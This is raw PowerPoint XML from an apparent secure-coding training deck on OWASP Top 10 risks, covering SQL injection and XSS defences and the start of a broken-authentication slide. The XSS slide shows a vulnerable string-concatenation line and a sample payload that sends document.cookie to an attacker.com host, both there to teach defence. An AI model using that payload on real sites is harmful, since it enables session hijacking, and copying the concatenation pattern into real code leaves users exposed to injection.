              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1047251" y="1319958"/>
            <a:ext cx="10876793" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SUMMARY:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Apply the principle of least privilege to the database account </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What does it really need to be able to do? </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Always </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>parameterise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> untrusted data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Never just concatenate query and data </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Stored procedures also offer protection via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>parameterisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just remember you can still build an injection risk into them </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Always validate untrusted data against a whitelist </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember type conversion, regexes and known good values </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Use ORMs and their native ability to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>parameterise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They’re also a great time saver </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remember the ease of exploitation by automated tools </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injection consequences can be severe and be easily exploited </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3000837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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="7842211"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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS – Cross site scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="918043" y="3336640"/>
            <a:ext cx="10876793" cy="3508653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Example Attack Scenario </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Scenario #1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(String) page += “&lt;input name=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ type=‘TEXT’ value=‘” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“CC”) + “’&gt;";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The attacker modifies the ‘CC’ parameter in the browser to: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=‘http://www.attacker.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie.cgi?coo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;’. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Note:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Attackers can use XSS to defeat any automated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>CrossSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Request Forgery ( CSRF) defense the application might employ.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="1600" dirty="0" err="1">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5023CB0C-99B1-46D1-A384-48796CB5F255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="918043" y="903044"/>
            <a:ext cx="7842211" cy="2168353"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solid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02427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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="7842211"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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS – Cross site scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF4C6FF7-7CB5-4E57-AB90-5F2C187ACD8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="456993" y="1800017"/>
            <a:ext cx="10582275" cy="3933825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4172296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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="7842211"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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS – Cross site scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{951D3164-AD5D-4FF4-A3B3-EE1FBA1F1338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="729199" y="1796074"/>
            <a:ext cx="10876793" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" sz="1600" dirty="0" err="1">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E7A5AAE-4BD0-4601-B297-6006F383CCA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72208" y="1509164"/>
            <a:ext cx="8989031" cy="4916276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2244745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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="7842211"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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS – Cross site scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{951D3164-AD5D-4FF4-A3B3-EE1FBA1F1338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="729199" y="1796074"/>
            <a:ext cx="10876793" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" sz="1600" dirty="0" err="1">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D39B7CF6-52D2-4BF5-B028-943875BF8D6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="729198" y="1564717"/>
            <a:ext cx="10876793" cy="4985980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SUMMARY:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Output encoding is the cornerstone of XSS protection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember to correctly encode for different output contexts </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Be wary of the encoding differences between web forms controls </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many control properties don’t natively implement encoding </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>ASP.NET MVC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>offers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> excellent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1"/>
              <a:t>implicit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> support </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Whitelist are still very important </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Always validate all untrusted data against a whitelist of allowable values </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Request validation is an important safety net </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It’s even better in .NET 4.5 but don’t rely on it alone </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Code your app as though you have persistent XSS in the database </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>XSS browser defenses exist, but they’re inconsistent </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Expect attackers to use obfuscated URLs </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337136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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="6843412"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3. Broken Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="918043" y="3429000"/>
            <a:ext cx="10876793" cy="3316292"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Example Attack Scenarios </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Scenario #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, the use of lists of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>known passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, is a common attack. If an application does not implement automated threat or credential stuffing protections, the application can be used as a password oracle to determine if the credentials are valid. </a:t>
            </a:r>
            <a:br>
